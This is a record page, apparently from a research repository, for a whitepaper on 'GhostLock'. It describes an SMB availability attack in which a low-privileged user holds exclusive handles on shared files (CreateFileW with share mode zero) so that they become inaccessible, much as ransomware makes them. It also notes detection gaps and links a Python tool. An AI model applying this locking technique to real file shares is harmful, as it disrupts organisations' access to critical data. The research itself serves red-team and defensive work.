GhostLock: SMB Deny-Share Handles as a Zero-Privilege Availability Weapon
Description
Traditional ransomware disrupts organizations by encrypting data and demanding payment for decryption keys. This paper presents a fundamentally different availability attack that achieves the same business disruption without writing a single encrypted byte to disk.
By calling the Windows API CreateFileW with dwShareMode set to zero, a low-privileged domain user with standard read access to a corporate SMB file share can hold files in an exclusively locked state for an indefinite duration. The result is identical to ransomware from the victim's perspective: critical files become inaccessible, ERP and workflow systems fail, and recovery requires specialist intervention.
The difference is what the attack does not produce. No writes. No renames. No new file extensions. No encryption overhead. No C2 infrastructure. Every behavioral ransomware defense in the modern enterprise stack is completely blind to it. The only reliable detection signal sits inside the file server itself, in a metric that virtually no enterprise SIEM currently ingests.
No CVE. No patch. This is documented Windows behavior, working exactly as designed for 30 years. The GhostLock tool demonstrates this technique, developed and tested under explicit written authorization during an authorized red team engagement.
Files
ghostlock_whitepaper.pdf
Files
(54.3 kB)
| Name | Size | Download all |
|---|---|---|
|
md5:c64df435515814f83cf09fd7b2463b32
|
54.3 kB | Preview Download |
Additional details
Software
- Repository URL
- https://github.com/kimd155/ghostlock
- Programming language
- Python
- Development Status
- Active